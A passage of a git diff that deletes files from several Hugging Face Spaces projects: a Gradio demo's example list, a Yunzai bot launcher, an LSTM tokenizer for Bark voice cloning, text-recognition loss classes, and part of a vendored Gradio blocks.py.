- 'images/08/000295.jpg',
- 'images/08/002505.jpg',
- 'images/08/000085.jpg',
- 'images/08/000290.jpg',
- 'images/08/000465.jpg',
- 'images/08/000790.jpg',
- 'images/08/001005.jpg',
- 'images/08/001380.jpg',
- 'images/08/001530.jpg',
- 'images/08/002360.jpg',
- 'images/08/004059.jpg',
- 'images/08/003149.jpg',
- 'images/08/001446.jpg',
- 'images/08/000010.jpg',
- 'images/08/001122.jpg',
- 'images/08/003533.jpg',
- 'images/08/003365.jpg',
- 'images/08/002944.jpg',
- 'images/08/000822.jpg',
- 'images/08/000103.jpg',
- 'images/08/002716.jpg',
- 'images/08/000187.jpg',
- 'images/08/002128.jpg',
- 'images/08/000511.jpg',
- 'images/08/000618.jpg',
- 'images/08/002010.jpg',
- 'images/08/000234.jpg',
- 'images/08/001842.jpg',
- 'images/08/001687.jpg',
- 'images/08/003929.jpg',
- 'images/08/002272.jpg',
-]
-
-
-
-
-demo = gr.Interface(
- predict,
- gr.Image(shape=(1220, 370)),
- gr.Plot(),
- article=article,
- title=title,
- enable_queue=True,
- cache_examples=False,
- live=False,
- examples=examples,
- description=description)
-
-
-demo.launch(enable_queue=True, debug=False)
\ No newline at end of file
diff --git a/spaces/CikeyQI/Yunzai/Yunzai/app.js b/spaces/CikeyQI/Yunzai/Yunzai/app.js
deleted file mode 100644
index 6feed2aa2a5f229da43a369ed249523cfdfe5cfc..0000000000000000000000000000000000000000
--- a/spaces/CikeyQI/Yunzai/Yunzai/app.js
+++ /dev/null
@@ -1,3 +0,0 @@
-import Yunzai from "./lib/bot.js"
-global.Bot = new Yunzai
-Bot.run()
\ No newline at end of file
diff --git a/spaces/Cloudyy/bark-voice-cloning/hubert/customtokenizer.py b/spaces/Cloudyy/bark-voice-cloning/hubert/customtokenizer.py
deleted file mode 100644
index d8f84d90f198ce08b2ed38be714bcde7df3c46b4..0000000000000000000000000000000000000000
--- a/spaces/Cloudyy/bark-voice-cloning/hubert/customtokenizer.py
+++ /dev/null
@@ -1,182 +0,0 @@
-import json
-import os.path
-from zipfile import ZipFile
-
-import numpy
-import torch
-from torch import nn, optim
-from torch.serialization import MAP_LOCATION
-
-
-class CustomTokenizer(nn.Module):
- def __init__(self, hidden_size=1024, input_size=768, output_size=10000, version=0):
- super(CustomTokenizer, self).__init__()
- next_size = input_size
- if version == 0:
- self.lstm = nn.LSTM(input_size, hidden_size, 2, batch_first=True)
- next_size = hidden_size
- if version == 1:
- self.lstm = nn.LSTM(input_size, hidden_size, 2, batch_first=True)
- self.intermediate = nn.Linear(hidden_size, 4096)
- next_size = 4096
-
- self.fc = nn.Linear(next_size, output_size)
- self.softmax = nn.LogSoftmax(dim=1)
- self.optimizer: optim.Optimizer = None
- self.lossfunc = nn.CrossEntropyLoss()
- self.input_size = input_size
- self.hidden_size = hidden_size
- self.output_size = output_size
- self.version = version
-
- def forward(self, x):
- x, _ = self.lstm(x)
- if self.version == 1:
- x = self.intermediate(x)
- x = self.fc(x)
- x = self.softmax(x)
- return x
-
- @torch.no_grad()
- def get_token(self, x):
- """
- Used to get the token for the first
- :param x: An array with shape (N, input_size) where N is a whole number greater or equal to 1, and input_size is the input size used when creating the model.
- :return: An array with shape (N,) where N is the same as N from the input. Every number in the array is a whole number in range 0...output_size - 1 where output_size is the output size used when creating the model.
- """
- return torch.argmax(self(x), dim=1)
-
- def prepare_training(self):
- self.optimizer = optim.Adam(self.parameters(), 0.001)
-
- def train_step(self, x_train, y_train, log_loss=False):
- # y_train = y_train[:-1]
- # y_train = y_train[1:]
-
- optimizer = self.optimizer
- lossfunc = self.lossfunc
- # Zero the gradients
- self.zero_grad()
-
- # Forward pass
- y_pred = self(x_train)
-
- y_train_len = len(y_train)
- y_pred_len = y_pred.shape[0]
-
- if y_train_len > y_pred_len:
- diff = y_train_len - y_pred_len
- y_train = y_train[diff:]
- elif y_train_len < y_pred_len:
- diff = y_pred_len - y_train_len
- y_pred = y_pred[:-diff, :]
-
- y_train_hot = torch.zeros(len(y_train), self.output_size)
- y_train_hot[range(len(y_train)), y_train] = 1
- y_train_hot = y_train_hot.to('cuda')
-
- # Calculate the loss
- loss = lossfunc(y_pred, y_train_hot)
-
- # Print loss
- if log_loss:
- print('Loss', loss.item())
-
- # Backward pass
- loss.backward()
-
- # Update the weights
- optimizer.step()
-
- def save(self, path):
- info_path = os.path.basename(path) + '/.info'
- torch.save(self.state_dict(), path)
- data_from_model = Data(self.input_size, self.hidden_size, self.output_size, self.version)
- with ZipFile(path, 'a') as model_zip:
- model_zip.writestr(info_path, data_from_model.save())
- model_zip.close()
-
- @staticmethod
- def load_from_checkpoint(path, map_location: MAP_LOCATION = None):
- old = True
- with ZipFile(path) as model_zip:
- filesMatch = [file for file in model_zip.namelist() if file.endswith('/.info')]
- file = filesMatch[0] if filesMatch else None
- if file:
- old = False
- data_from_model = Data.load(model_zip.read(file).decode('utf-8'))
- model_zip.close()
- if old:
- model = CustomTokenizer()
- else:
- model = CustomTokenizer(data_from_model.hidden_size, data_from_model.input_size, data_from_model.output_size, data_from_model.version)
- model.load_state_dict(torch.load(path, map_location))
- return model
-
-
-
-class Data:
- input_size: int
- hidden_size: int
- output_size: int
- version: int
-
- def __init__(self, input_size=768, hidden_size=1024, output_size=10000, version=0):
- self.input_size = input_size
- self.hidden_size = hidden_size
- self.output_size = output_size
- self.version = version
-
- @staticmethod
- def load(string):
- data = json.loads(string)
- return Data(data['input_size'], data['hidden_size'], data['output_size'], data['version'])
-
- def save(self):
- data = {
- 'input_size': self.input_size,
- 'hidden_size': self.hidden_size,
- 'output_size': self.output_size,
- 'version': self.version,
- }
- return json.dumps(data)
-
-
-def auto_train(data_path, save_path='model.pth', load_model: str | None = None, save_epochs=1):
- data_x, data_y = [], []
-
- if load_model and os.path.isfile(load_model):
- print('Loading model from', load_model)
- model_training = CustomTokenizer.load_from_checkpoint(load_model, 'cuda')
- else:
- print('Creating new model.')
- model_training = CustomTokenizer(version=1).to('cuda') # Settings for the model to run without lstm
- save_path = os.path.join(data_path, save_path)
- base_save_path = '.'.join(save_path.split('.')[:-1])
-
- sem_string = '_semantic.npy'
- feat_string = '_semantic_features.npy'
-
- ready = os.path.join(data_path, 'ready')
- for input_file in os.listdir(ready):
- full_path = os.path.join(ready, input_file)
- if input_file.endswith(sem_string):
- data_y.append(numpy.load(full_path))
- elif input_file.endswith(feat_string):
- data_x.append(numpy.load(full_path))
- model_training.prepare_training()
-
- epoch = 1
-
- while 1:
- for i in range(save_epochs):
- j = 0
- for x, y in zip(data_x, data_y):
- model_training.train_step(torch.tensor(x).to('cuda'), torch.tensor(y).to('cuda'), j % 50 == 0) # Print loss every 50 steps
- j += 1
- save_p = save_path
- save_p_2 = f'{base_save_path}_epoch_{epoch}.pth'
- model_training.save(save_p)
- model_training.save(save_p_2)
- print(f'Epoch {epoch} completed')
- epoch += 1
diff --git a/spaces/Cyril666/my_abi/losses.py b/spaces/Cyril666/my_abi/losses.py
deleted file mode 100644
index 1b718a9ce2dd125ccd2c45f112fb278a299f4a99..0000000000000000000000000000000000000000
--- a/spaces/Cyril666/my_abi/losses.py
+++ /dev/null
@@ -1,72 +0,0 @@
-from fastai.vision import *
-
-from modules.model import Model
-
-
-class MultiLosses(nn.Module):
- def __init__(self, one_hot=True):
- super().__init__()
- self.ce = SoftCrossEntropyLoss() if one_hot else torch.nn.CrossEntropyLoss()
- self.bce = torch.nn.BCELoss()
-
- @property
- def last_losses(self):
- return self.losses
-
- def _flatten(self, sources, lengths):
- return torch.cat([t[:l] for t, l in zip(sources, lengths)])
-
- def _merge_list(self, all_res):
- if not isinstance(all_res, (list, tuple)):
- return all_res
- def merge(items):
- if isinstance(items[0], torch.Tensor): return torch.cat(items, dim=0)
- else: return items[0]
- res = dict()
- for key in all_res[0].keys():
- items = [r[key] for r in all_res]
- res[key] = merge(items)
- return res
-
- def _ce_loss(self, output, gt_labels, gt_lengths, idx=None, record=True):
- loss_name = output.get('name')
- pt_logits, weight = output['logits'], output['loss_weight']
-
- assert pt_logits.shape[0] % gt_labels.shape[0] == 0
- iter_size = pt_logits.shape[0] // gt_labels.shape[0]
- if iter_size > 1:
- gt_labels = gt_labels.repeat(3, 1, 1)
- gt_lengths = gt_lengths.repeat(3)
- flat_gt_labels = self._flatten(gt_labels, gt_lengths)
- flat_pt_logits = self._flatten(pt_logits, gt_lengths)
-
- nll = output.get('nll')
- if nll is not None:
- loss = self.ce(flat_pt_logits, flat_gt_labels, softmax=False) * weight
- else:
- loss = self.ce(flat_pt_logits, flat_gt_labels) * weight
- if record and loss_name is not None: self.losses[f'{loss_name}_loss'] = loss
-
- return loss
-
- def forward(self, outputs, *args):
- self.losses = {}
- if isinstance(outputs, (tuple, list)):
- outputs = [self._merge_list(o) for o in outputs]
- return sum([self._ce_loss(o, *args) for o in outputs if o['loss_weight'] > 0.])
- else:
- return self._ce_loss(outputs, *args, record=False)
-
-
-class SoftCrossEntropyLoss(nn.Module):
- def __init__(self, reduction="mean"):
- super().__init__()
- self.reduction = reduction
-
- def forward(self, input, target, softmax=True):
- if softmax: log_prob = F.log_softmax(input, dim=-1)
- else: log_prob = torch.log(input)
- loss = -(target * log_prob).sum(dim=-1)
- if self.reduction == "mean": return loss.mean()
- elif self.reduction == "sum": return loss.sum()
- else: return loss
diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/blocks.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/blocks.py
deleted file mode 100644
index f441d39d9b981b26dc711942b79b1ca73d71e6ad..0000000000000000000000000000000000000000
--- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/blocks.py
+++ /dev/null
@@ -1,2175 +0,0 @@
-from __future__ import annotations
-
-import copy
-import inspect
-import json
-import os
-import random
-import secrets
-import sys
-import threading
-import time
-import warnings
-import webbrowser
-from abc import abstractmethod
-from pathlib import Path
-from types import ModuleType
-from typing import TYPE_CHECKING, Any, AsyncIterator, Callable, Literal, cast
-
-import anyio
-import requests
-from anyio import CapacityLimiter
-from gradio_client import serializing
-from gradio_client import utils as client_utils
-from gradio_client.documentation import document, set_documentation_group
-from packaging import version
-
-from gradio import (
- analytics,
- components,
- external,
- networking,
- queueing,
- routes,
- strings,
- themes,
- utils,
- wasm_utils,
-)
-from gradio.context import Context
-from gradio.deprecation import check_deprecated_parameters, warn_deprecation
-from gradio.exceptions import (
- DuplicateBlockError,
- InvalidApiNameError,
- InvalidBlockError,
-)
-from gradio.helpers import EventData, create_tracker, skip, special_args
-from gradio.themes import Default as DefaultTheme
-from gradio.themes import ThemeClass as Theme
-from gradio.tunneling import (
- BINARY_FILENAME,
- BINARY_FOLDER,
- BINARY_PATH,
- BINARY_URL,
- CURRENT_TUNNELS,
-)
-from gradio.utils import (
- GRADIO_VERSION,
- TupleNoPrint,
- check_function_inputs_match,
- component_or_layout_class,
- delete_none,
- get_cancel_function,
- get_continuous_fn,
-)
-
-try:
- import spaces # type: ignore
-except Exception:
- spaces = None
-
-set_documentation_group("blocks")
-
-if TYPE_CHECKING: # Only import for type checking (is False at runtime).
- from fastapi.applications import FastAPI
-
- from gradio.components import Component
-
-BUILT_IN_THEMES: dict[str, Theme] = {
- t.name: t
- for t in [
- themes.Base(),
- themes.Default(),
- themes.Monochrome(),
- themes.Soft(),
- themes.Glass(),
- ]
-}
-
-
-class Block:
- def __init__(
- self,
- *,
- render: bool = True,
- elem_id: str | None = None,
- elem_classes: list[str] | str | None = None,
- visible: bool = True,
- root_url: str | None = None, # URL that is prepended to all file paths
- _skip_init_processing: bool = False, # Used for loading from Spaces
- **kwargs,
- ):
- self._id = Context.id
- Context.id += 1
- self.visible = visible
- self.elem_id = elem_id
- self.elem_classes = (
- [elem_classes] if isinstance(elem_classes, str) else elem_classes
- )
- self.root_url = root_url
- self.share_token = secrets.token_urlsafe(32)
- self._skip_init_processing = _skip_init_processing
- self.parent: BlockContext | None = None
-
- if render:
- self.render()
- check_deprecated_parameters(self.__class__.__name__, kwargs=kwargs)
-
- def render(self):
- """
- Adds self into appropriate BlockContext
- """
- if Context.root_block is not None and self._id in Context.root_block.blocks:
- raise DuplicateBlockError(
- f"A block with id: {self._id} has already been rendered in the current Blocks."
- )
- if Context.block is not None:
- Context.block.add(self)
- if Context.root_block is not None:
- Context.root_block.blocks[self._id] = self
- if isinstance(self, components.IOComponent):
- Context.root_block.temp_file_sets.append(self.temp_files)
- return self
-
- def unrender(self):
- """
- Removes self from BlockContext if it has been rendered (otherwise does nothing).
- Removes self from the layout and collection of blocks, but does not delete any event triggers.
- """
- if Context.block is not None:
- try:
- Context.block.children.remove(self)
- except ValueError:
- pass
- if Context.root_block is not None:
- try:
- del Context.root_block.blocks[self._id]
- except KeyError:
- pass
- return self
-
- def get_block_name(self) -> str:
- """
- Gets block's class name.
-
- If it is template component it gets the parent's class name.
-
- @return: class name
- """
- return (
- self.__class__.__base__.__name__.lower()
- if hasattr(self, "is_template")
- else self.__class__.__name__.lower()
- )
-
- def get_expected_parent(self) -> type[BlockContext] | None:
- return None
-
- def set_event_trigger(
- self,
- event_name: str,
- fn: Callable | None,
- inputs: Component | list[Component] | set[Component] | None,
- outputs: Component | list[Component] | None,
- preprocess: bool = True,
- postprocess: bool = True,
- scroll_to_output: bool = False,
- show_progress: str = "full",
- api_name: str | None | Literal[False] = None,
- js: str | None = None,
- no_target: bool = False,
- queue: bool | None = None,
- batch: bool = False,
- max_batch_size: int = 4,
- cancels: list[int] | None = None,
- every: float | None = None,
- collects_event_data: bool | None = None,
- trigger_after: int | None = None,
- trigger_only_on_success: bool = False,
- ) -> tuple[dict[str, Any], int]:
- """
- Adds an event to the component's dependencies.
- Parameters:
- event_name: event name
- fn: Callable function
- inputs: input list
- outputs: output list
- preprocess: whether to run the preprocess methods of components
- postprocess: whether to run the postprocess methods of components
- scroll_to_output: whether to scroll to output of dependency on trigger
- show_progress: whether to show progress animation while running.
- api_name: defines how the endpoint appears in the API docs. Can be a string, None, or False. If False, the endpoint will not be exposed in the api docs. If set to None, the endpoint will be exposed in the api docs as an unnamed endpoint, although this behavior will be changed in Gradio 4.0. If set to a string, the endpoint will be exposed in the api docs with the given name.
- js: Experimental parameter (API may change): Optional frontend js method to run before running 'fn'. Input arguments for js method are values of 'inputs' and 'outputs', return should be a list of values for output components
- no_target: if True, sets "targets" to [], used for Blocks "load" event
- queue: If True, will place the request on the queue, if the queue has been enabled. If False, will not put this event on the queue, even if the queue has been enabled. If None, will use the queue setting of the gradio app.
- batch: whether this function takes in a batch of inputs
- max_batch_size: the maximum batch size to send to the function
- cancels: a list of other events to cancel when this event is triggered. For example, setting cancels=[click_event] will cancel the click_event, where click_event is the return value of another components .click method.
- every: Run this event 'every' number of seconds while the client connection is open. Interpreted in seconds. Queue must be enabled.
- collects_event_data: whether to collect event data for this event
- trigger_after: if set, this event will be triggered after 'trigger_after' function index
- trigger_only_on_success: if True, this event will only be triggered if the previous event was successful (only applies if `trigger_after` is set)
- Returns: dependency information, dependency index
- """
- # Support for singular parameter
- if isinstance(inputs, set):
- inputs_as_dict = True
- inputs = sorted(inputs, key=lambda x: x._id)
- else:
- inputs_as_dict = False
- if inputs is None:
- inputs = []
- elif not isinstance(inputs, list):
- inputs = [inputs]
-
- if isinstance(outputs, set):
- outputs = sorted(outputs, key=lambda x: x._id)
- else:
- if outputs is None:
- outputs = []
- elif not isinstance(outputs, list):
- outputs = [outputs]
-
- if fn is not None and not cancels:
- check_function_inputs_match(fn, inputs, inputs_as_dict)
-
- if Context.root_block is None:
- raise AttributeError(
- f"{event_name}() and other events can only be called within a Blocks context."
- )
- if every is not None and every <= 0:
- raise ValueError("Parameter every must be positive or None")
- if every and batch:
- raise ValueError(
- f"Cannot run {event_name} event in a batch and every {every} seconds. "
- "Either batch is True or every is non-zero but not both."
- )
-
- if every and fn:
- fn = get_continuous_fn(fn, every)
- elif every:
- raise ValueError("Cannot set a value for `every` without a `fn`.")
-
- _, progress_index, event_data_index = (
- special_args(fn) if fn else (None, None, None)
- )
- Context.root_block.fns.append(
- BlockFunction(
- fn,
- inputs,
- outputs,
- preprocess,
- postprocess,
- inputs_as_dict,
- progress_index is not None,
- )
- )
- if api_name is not None and api_name is not False:
- api_name_ = utils.append_unique_suffix(
- api_name, [dep["api_name"] for dep in Context.root_block.dependencies]
- )
- if api_name != api_name_:
- warnings.warn(f"api_name {api_name} already exists, using {api_name_}")
- api_name = api_name_
-
- if collects_event_data is None:
- collects_event_data = event_data_index is not None
-
- dependency = {
- "targets": [self._id] if not no_target else [],
- "trigger": event_name,
- "inputs": [block._id for block in inputs],
- "outputs": [block._id for block in outputs],
- "backend_fn": fn is not None,
- "js": js,
- "queue": False if fn is None else queue,
- "api_name": api_name,
- "scroll_to_output": False if utils.get_space() else scroll_to_output,
- "show_progress": show_progress,
- "every": every,
- "batch": batch,
- "max_batch_size": max_batch_size,
- "cancels": cancels or [],
- "types": {
- "continuous": bool(every),
- "generator": inspect.isgeneratorfunction(fn) or bool(every),
- },
- "collects_event_data": collects_event_data,
- "trigger_after": trigger_after,
- "trigger_only_on_success": trigger_only_on_success,
- }
- Context.root_block.dependencies.append(dependency)
- return dependency, len(Context.root_block.dependencies) - 1
-
- def get_config(self):
- return {
- "visible": self.visible,
- "elem_id": self.elem_id,
- "elem_classes": self.elem_classes,
- "root_url": self.root_url,
- }
-
- @staticmethod
- @abstractmethod
- def update(**kwargs) -> dict:
- return {}
-
- @classmethod
- def get_specific_update(cls, generic_update: dict[str, Any]) -> dict:
- generic_update = generic_update.copy()
- del generic_update["__type__"]
- specific_update = cls.update(**generic_update)
- return specific_update
-
-
-class BlockContext(Block):
- def __init__(
- self,
- visible: bool = True,
- render: bool = True,
- **kwargs,
- ):
- """
- Parameters:
- visible: If False, this will be hidden but included in the Blocks config file (its visibility can later be updated).
- render: If False, this will not be included in the Blocks config file at all.
- """
- self.children: list[Block] = []
- Block.__init__(self, visible=visible, render=render, **kwargs)
-
- def add_child(self, child: Block):
- self.children.append(child)
-
- def __enter__(self):
- self.parent = Context.block
- Context.block = self
- return self
-
- def add(self, child: Block):
- child.parent = self
- self.children.append(child)
-
- def fill_expected_parents(self):
- children = []
- pseudo_parent = None
- for child in self.children:
- expected_parent = child.get_expected_parent()
- if not expected_parent or isinstance(self, expected_parent):
- pseudo_parent = None
- children.append(child)
- else:
- if pseudo_parent is not None and isinstance(
- pseudo_parent, expected_parent
- ):
- pseudo_parent.add_child(child)
- else:
- pseudo_parent = expected_parent(render=False)
- pseudo_parent.parent = self
- children.append(pseudo_parent)
- pseudo_parent.add_child(child)
- if Context.root_block:
- Context.root_block.blocks[pseudo_parent._id] = pseudo_parent
- child.parent = pseudo_parent
- self.children = children
-
- def __exit__(self, *args):
- if getattr(self, "allow_expected_parents", True):
- self.fill_expected_parents()
- Context.block = self.parent
-
- def postprocess(self, y):
- """
- Any postprocessing needed to be performed on a block context.
- """
- return y
-
-
-class BlockFunction:
- def __init__(
- self,
- fn: Callable | None,
- inputs: list[Component],
- outputs: list[Component],
- preprocess: bool,
- postprocess: bool,
- inputs_as_dict: bool,
- tracks_progress: bool = False,
- ):
- self.fn = fn
- self.inputs = inputs
- self.outputs = outputs
- self.preprocess = preprocess
- self.postprocess = postprocess
- self.tracks_progress = tracks_progress
- self.total_runtime = 0
- self.total_runs = 0
- self.inputs_as_dict = inputs_as_dict
- self.name = getattr(fn, "__name__", "fn") if fn is not None else None
- self.spaces_auto_wrap()
-
- def spaces_auto_wrap(self):
- if spaces is None:
- return
- if utils.get_space() is None:
- return
- self.fn = spaces.gradio_auto_wrap(self.fn)
-
- def __str__(self):
- return str(
- {
- "fn": self.name,
- "preprocess": self.preprocess,
- "postprocess": self.postprocess,
- }
- )
-
- def __repr__(self):
- return str(self)
-
-
-class class_or_instancemethod(classmethod): # noqa: N801
- def __get__(self, instance, type_):
- descr_get = super().__get__ if instance is None else self.__func__.__get__
- return descr_get(instance, type_)
-
-
-def postprocess_update_dict(block: Block, update_dict: dict, postprocess: bool = True):
- """
- Converts a dictionary of updates into a format that can be sent to the frontend.
- E.g. {"__type__": "generic_update", "value": "2", "interactive": False}
- Into -> {"__type__": "update", "value": 2.0, "mode": "static"}
-
- Parameters:
- block: The Block that is being updated with this update dictionary.
- update_dict: The original update dictionary
- postprocess: Whether to postprocess the "value" key of the update dictionary.
- """
- if update_dict.get("__type__", "") == "generic_update":
- update_dict = block.get_specific_update(update_dict)
- if update_dict.get("value") is components._Keywords.NO_VALUE:
- update_dict.pop("value")
- interactive = update_dict.pop("interactive", None)
- if interactive is not None:
- update_dict["mode"] = "dynamic" if interactive else "static"
- prediction_value = delete_none(update_dict, skip_value=True)
- if "value" in prediction_value and postprocess:
- assert isinstance(
- block, components.IOComponent
- ), f"Component {block.__class__} does not support value"
- prediction_value["value"] = block.postprocess(prediction_value["value"])
- return prediction_value
-
-
-def convert_component_dict_to_list(
- outputs_ids: list[int], predictions: dict
-) -> list | dict:
- """
- Converts a dictionary of component updates into a list of updates in the order of
- the outputs_ids and including every output component. Leaves other types of dictionaries unchanged.
- E.g. {"textbox": "hello", "number": {"__type__": "generic_update", "value": "2"}}
- Into -> ["hello", {"__type__": "generic_update"}, {"__type__": "generic_update", "value": "2"}]
- """
- keys_are_blocks = [isinstance(key, Block) for key in predictions]
- if all(keys_are_blocks):
- reordered_predictions = [skip() for _ in outputs_ids]
- for component, value in predictions.items():
- if component._id not in outputs_ids:
- raise ValueError(
- f"Returned component {component} not specified as output of function."
- )
- output_index = outputs_ids.index(component._id)
- reordered_predictions[output_index] = value
- predictions = utils.resolve_singleton(reordered_predictions)
- elif any(keys_are_blocks):
- raise ValueError(
- "Returned dictionary included some keys as Components. Either all keys must be Components to assign Component values, or return a List of values to assign output values in order."
- )
- return predictions
-
-
-def get_api_info(config: dict, serialize: bool = True):
- """
- Gets the information needed to generate the API docs from a Blocks config.
- Parameters:
- config: a Blocks config dictionary
- serialize: If True, returns the serialized version of the typed information. If False, returns the raw version.
- """
- api_info = {"named_endpoints": {}, "unnamed_endpoints": {}}
- mode = config.get("mode", None)
- after_new_format = version.parse(config.get("version", "2.0")) > version.Version(
- "3.28.3"
- )
-
- for d, dependency in enumerate(config["dependencies"]):
- dependency_info = {"parameters": [], "returns": []}
- skip_endpoint = False
-
- inputs = dependency["inputs"]
- for i in inputs:
- for component in config["components"]:
- if component["id"] == i:
- break
- else:
- skip_endpoint = True # if component not found, skip endpoint
- break
- type = component["type"]
- if type in client_utils.SKIP_COMPONENTS:
- continue
- if (
- not component.get("serializer")
- and type not in serializing.COMPONENT_MAPPING
- ):
- skip_endpoint = True # if component not serializable, skip endpoint
- break
- if type in client_utils.SKIP_COMPONENTS:
- continue
- label = component["props"].get("label", f"parameter_{i}")
- # The config has the most specific API info (taking into account the parameters
- # of the component), so we use that if it exists. Otherwise, we fallback to the
- # Serializer's API info.
- serializer = serializing.COMPONENT_MAPPING[type]()
- if component.get("api_info") and after_new_format:
- info = component["api_info"]
- example = component["example_inputs"]["serialized"]
- else:
- assert isinstance(serializer, serializing.Serializable)
- info = serializer.api_info()
- example = serializer.example_inputs()["raw"]
- python_info = info["info"]
- if serialize and info["serialized_info"]:
- python_info = serializer.serialized_info()
- if (
- isinstance(serializer, serializing.FileSerializable)
- and component["props"].get("file_count", "single") != "single"
- ):
- python_info = serializer._multiple_file_serialized_info()
-
- python_type = client_utils.json_schema_to_python_type(python_info)
- serializer_name = serializing.COMPONENT_MAPPING[type].__name__
- dependency_info["parameters"].append(
- {
- "label": label,
- "type": info["info"],
- "python_type": {
- "type": python_type,
- "description": python_info.get("description", ""),
- },
- "component": type.capitalize(),
- "example_input": example,
- "serializer": serializer_name,
- }
- )
-
- outputs = dependency["outputs"]
- for o in outputs:
- for component in config["components"]:
- if component["id"] == o:
- break
- else:
- skip_endpoint = True # if component not found, skip endpoint
- break
- type = component["type"]
- if type in client_utils.SKIP_COMPONENTS:
- continue
- if (
- not component.get("serializer")
- and type not in serializing.COMPONENT_MAPPING
- ):
- skip_endpoint = True # if component not serializable, skip endpoint
- break
- label = component["props"].get("label", f"value_{o}")
- serializer = serializing.COMPONENT_MAPPING[type]()
- if component.get("api_info") and after_new_format:
- info = component["api_info"]
- example = component["example_inputs"]["serialized"]
- else:
- assert isinstance(serializer, serializing.Serializable)
- info = serializer.api_info()
- example = serializer.example_inputs()["raw"]
- python_info = info["info"]
- if serialize and info["serialized_info"]:
- python_info = serializer.serialized_info()
- if (
- isinstance(serializer, serializing.FileSerializable)
- and component["props"].get("file_count", "single") != "single"
- ):
- python_info = serializer._multiple_file_serialized_info()
- python_type = client_utils.json_schema_to_python_type(python_info)
- serializer_name = serializing.COMPONENT_MAPPING[type].__name__
- dependency_info["returns"].append(
- {
- "label": label,
- "type": info["info"],
- "python_type": {
- "type": python_type,
- "description": python_info.get("description", ""),
- },
- "component": type.capitalize(),
- "serializer": serializer_name,
- }
- )
-
- if not dependency["backend_fn"]:
- skip_endpoint = True
-
- if skip_endpoint:
- continue
- if dependency["api_name"] is not None and dependency["api_name"] is not False:
- api_info["named_endpoints"][f"/{dependency['api_name']}"] = dependency_info
- elif (
- dependency["api_name"] is False
- or mode == "interface"
- or mode == "tabbed_interface"
- ):
- pass # Skip unnamed endpoints in interface mode
- else:
- api_info["unnamed_endpoints"][str(d)] = dependency_info
-
- return api_info
-
-
-@document("launch", "queue", "integrate", "load")
-class Blocks(BlockContext):
- """
- Blocks is Gradio's low-level API that allows you to create more custom web
- applications and demos than Interfaces (yet still entirely in Python).
-
-
- Compared to the Interface class, Blocks offers more flexibility and control over:
- (1) the layout of components (2) the events that
- trigger the execution of functions (3) data flows (e.g. inputs can trigger outputs,
- which can trigger the next level of outputs). Blocks also offers ways to group
- together related demos such as with tabs.
-
-
- The basic usage of Blocks is as follows: create a Blocks object, then use it as a
- context (with the "with" statement), and then define layouts, components, or events
- within the Blocks context. Finally, call the launch() method to launch the demo.
-
- Example:
- import gradio as gr
- def update(name):
- return f"Welcome to Gradio, {name}!"
-
- with gr.Blocks() as demo:
- gr.Markdown("Start typing below and then click **Run** to see the output.")
- with gr.Row():
- inp = gr.Textbox(placeholder="What is your name?")
- out = gr.Textbox()
- btn = gr.Button("Run")
- btn.click(fn=update, inputs=inp, outputs=out)
-
- demo.launch()
- Demos: blocks_hello, blocks_flipper, blocks_speech_text_sentiment, generate_english_german, sound_alert
- Guides: blocks-and-event-listeners, controlling-layout, state-in-blocks, custom-CSS-and-JS, custom-interpretations-with-blocks, using-blocks-like-functions
- """
-
- def __init__(
- self,
- theme: Theme | str | None = None,
- analytics_enabled: bool | None = None,
- mode: str = "blocks",
- title: str = "Gradio",
- css: str | None = None,
- **kwargs,
- ):
- """
- Parameters:
- theme: a Theme object or a string representing a theme. If a string, will look for a built-in theme with that name (e.g. "soft" or "default"), or will attempt to load a theme from the HF Hub (e.g. "gradio/monochrome"). If None, will use the Default theme.
- analytics_enabled: whether to allow basic telemetry. If None, will use GRADIO_ANALYTICS_ENABLED environment variable or default to True.
- mode: a human-friendly name for the kind of Blocks or Interface being created.
- title: The tab title to display when this is opened in a browser window.
- css: custom css or path to custom css file to apply to entire Blocks
- """
- self.limiter = None
- if theme is None:
- theme = DefaultTheme()
- elif isinstance(theme, str):
- if theme.lower() in BUILT_IN_THEMES:
- theme = BUILT_IN_THEMES[theme.lower()]
- else:
- try:
- theme = Theme.from_hub(theme)
- except Exception as e:
- warnings.warn(f"Cannot load {theme}. Caught Exception: {str(e)}")
- theme = DefaultTheme()
- if not isinstance(theme, Theme):
- warnings.warn("Theme should be a class loaded from gradio.themes")
- theme = DefaultTheme()
- self.theme: Theme = theme
- self.theme_css = theme._get_theme_css()
- self.stylesheets = theme._stylesheets
- self.encrypt = False
- self.share = False
- self.enable_queue = None
- self.max_threads = 40
- self.show_error = True
- if css is not None and os.path.exists(css):
- with open(css) as css_file:
- self.css = css_file.read()
- else:
- self.css = css
-
- # For analytics_enabled and allow_flagging: (1) first check for
- # parameter, (2) check for env variable, (3) default to True/"manual"
- self.analytics_enabled = (
- analytics_enabled
- if analytics_enabled is not None
- else analytics.analytics_enabled()
- )
- if self.analytics_enabled:
- t = threading.Thread(target=analytics.version_check)
- t.start()
- else:
- os.environ["HF_HUB_DISABLE_TELEMETRY"] = "True"
- super().__init__(render=False, **kwargs)
- self.blocks: dict[int, Block] = {}
- self.fns: list[BlockFunction] = []
- self.dependencies = []
- self.mode = mode
-
- self.is_running = False
- self.local_url = None
- self.share_url = None
- self.width = None
- self.height = None
- self.api_open = True
-
- self.space_id = utils.get_space()
- self.favicon_path = None
- self.auth = None
- self.dev_mode = True
- self.app_id = random.getrandbits(64)
- self.temp_file_sets = []
- self.title = title
- self.show_api = True
-
- # Only used when an Interface is loaded from a config
- self.predict = None
- self.input_components = None
- self.output_components = None
- self.__name__ = None
- self.api_mode = None
- self.progress_tracking = None
- self.ssl_verify = True
-
- self.allowed_paths = []
- self.blocked_paths = []
- self.root_path = ""
- self.root_urls = set()
-
- if not wasm_utils.IS_WASM and self.analytics_enabled:
- is_custom_theme = not any(
- self.theme.to_dict() == built_in_theme.to_dict()
- for built_in_theme in BUILT_IN_THEMES.values()
- )
- data = {
- "mode": self.mode,
- "custom_css": self.css is not None,
- "theme": self.theme.name,
- "is_custom_theme": is_custom_theme,
- "version": GRADIO_VERSION,
- }
- analytics.initiated_analytics(data)
-
- @classmethod
- def from_config(
- cls,
- config: dict,
- fns: list[Callable],
- root_url: str,
- ) -> Blocks:
- """
- Factory method that creates a Blocks from a config and list of functions. Used
- internally by the gradio.external.load() method.
-
- Parameters:
- config: a dictionary containing the configuration of the Blocks.
